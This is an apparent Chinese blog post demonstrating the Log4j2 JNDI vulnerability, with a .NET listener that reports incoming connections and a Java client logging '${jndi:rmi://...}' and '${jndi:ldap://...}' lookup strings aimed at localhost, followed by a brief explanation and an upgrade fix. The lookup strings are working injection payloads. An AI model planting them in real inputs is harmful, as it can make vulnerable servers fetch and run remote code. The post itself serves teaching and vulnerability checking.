由于本人.net和java都擅长,所以正好拿此次漏洞演示一下。(编程界名言打头:don't talk to me, show me the code)
.net代码,想不到吧,最新的net6居然是全局代码,哈哈,还有各种语法糖!
using System.Net;
using System.Net.Sockets;
TcpListener? tcpListener = null;
int port = 8100;
tcpListener = new TcpListener(new IPEndPoint(IPAddress.Any, port));
tcpListener.Start();
new Thread(() =>
{
while (true)
{
TcpClient tcpClient = tcpListener.AcceptTcpClient();
Console.WriteLine("connection from [RemoteEndPoint],尼玛,可能存在漏洞!");
tcpClient.Close();
}
})
{ IsBackground = true }.Start();
Console.WriteLine($"开启监听,端口${port}");
Console.ReadLine();
tcpListener.Stop();
java代码,什么语法糖之类的就别想了!!!
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.core.config.Configurator;
public class Client {
static Logger log = LogManager.getLogger(Client.class);
public static void main(String[] args) {
System.out.println(LogManager.getRootLogger().getLevel().toString());
Logger logger=LogManager.getRootLogger();
Configurator.setAllLevels(logger.getName(), Level.INFO);
System.out.println("hello log");
log.info("${jndi:rmi://127.0.0.1:8100/Main}");
log.info("${jndi:ldap://127.0.0.1:8100/Main}");
System.out.println("入侵成功!");
}
}
运行结果
.net运行结果
java运行结果
总结
简单来说就是 Log4j2 会通过 rmi 或者 ldap 协议访问后面的地址,根据协议的内容解析,有可能执行已经恶意构造的代码。
解决方案, 升级到2.14.1之上
Apache Log4j 2.x <= 2.14.1
